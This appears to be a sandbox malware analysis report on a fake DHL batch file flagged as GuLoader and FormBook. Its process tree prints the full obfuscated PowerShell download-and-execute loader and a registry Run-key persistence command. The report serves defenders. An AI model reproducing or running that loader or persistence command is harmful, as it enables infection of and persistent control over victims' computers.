Windows Analysis Report
rDHL_PT563857935689275783656385FV-GDS3535353.bat

Overview

General Information

Sample name: rDHL_PT563857935689275783656385FV-GDS3535353.bat
Analysis ID: 1473659
MD5: 60186cd9a2e82835bc143c1fb4662b7e
SHA1: 880c7f14743f9759b30bcc28085949122f54c20e
SHA256: b66081b0e5dfe21e03d1043700d7c05e65bda96ad33a6370c374217d5ae84405
Tags: bat

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6716 cmdline: powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo 
aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. 
OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5824 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6988 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo 
aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. 
OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6740 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6020 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 3732 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5936 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1408f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security

Source | Rule | Description | Author | Strings
Source: amsi64_6716.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi32_6988.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
            • 0xe12d:$b2: ::FromBase64String(
            • 0xd1c0:$s1: -join
            • 0x696c:$s4: +=
            • 0x6a2e:$s4: +=
            • 0xac55:$s4: +=
            • 0xcd72:$s4: +=
            • 0xd05c:$s4: +=
            • 0xd1a2:$s4: +=
            • 0x16c77:$s4: +=
            • 0x16cf7:$s4: +=
            • 0x16dbd:$s4: +=
            • 0x16e3d:$s4: +=
            • 0x17013:$s4: +=
            • 0x17097:$s4: +=
            • 0xd9d4:$e4: Get-WmiObject
            • 0xdbc3:$e4: Get-Process
            • 0xdc1b:$e4: Start-Process
            • 0x1791c:$e4: Get-Process

            System Summary

Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6020, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 3732, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scleroconjunctival
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3732, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 5936, ProcessName: reg.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6020, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 3732, ProcessName: cmd.exe
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scleroconjunctival
